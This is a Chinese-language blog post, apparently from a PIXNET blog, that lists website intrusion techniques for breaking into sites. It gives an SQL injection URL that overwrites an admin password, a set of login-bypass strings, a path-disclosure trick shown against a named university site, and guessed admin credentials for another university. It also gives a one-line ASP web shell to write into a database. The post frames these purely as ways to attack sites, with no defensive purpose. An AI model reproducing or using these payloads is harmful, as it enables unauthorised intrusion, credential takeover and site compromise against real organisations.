找漏洞入侵1.上傳漏洞[不多講]
pS: 如果看到:選擇你要上傳的文件 [重新上傳]或者出現「請登陸後使用」,80%就有漏洞了!
有時上傳不一定會成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.


2.注入漏洞[不多講]
pS:對MD5密碼.有時我們不是哪麼容易跑出來.如果是[SQL數據庫].那麼我們可以用以下命令:
http://注入網址;update admin set password=』新MD5密碼』 where password=』舊MD5密碼』-- [admin為表名.]


3.旁注,也就是跨站.
我們入侵某站時可能這個站堅固的無懈可擊,我們可以找下和這個站同一服務器的站點,然後在利用這個站點用提權,嗅探等方法來入侵我們 要入侵的站點。,在這裡有個難點,就是一些服務器的絕對路徑經過加密,這就看我們的本事了



4.暴庫:把二級目錄中間的/換成%5c
EY:http://www.ahttc.edu.cn/otherweb ... s.asp?BigClassName=職責範圍&BigClassType=1
如果你能看到:』E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa』不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否 連接到文件存放的服務器。
這樣的就是數據庫了。下載時用FLASHGET換成.MDB格式的就行.


5.』or』=』or』這是一個可以連接SQL的語名句.可以直接進入後台。我收集了一下。類似的還有:
』or』』=』 " or "a"="a 』) or (』a』=』a ") or ("a"="a or 1=1-- 』 or 』a』=』a

6.社會工程學。這個我們都知道吧。就是猜解。
 EY:http://www.neu.edu.cn/waishi/admin
admin waishi

7.寫入ASP格式數據庫。就是一句話木馬[〈%execute request("value")%〉 ],常用在留言本.
EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[這個就是ASP格式的數據庫],再寫入一句話木馬


arrow
arrow
    全站熱搜

    Neo Chao 發表在 痞客邦 留言(0) 人氣()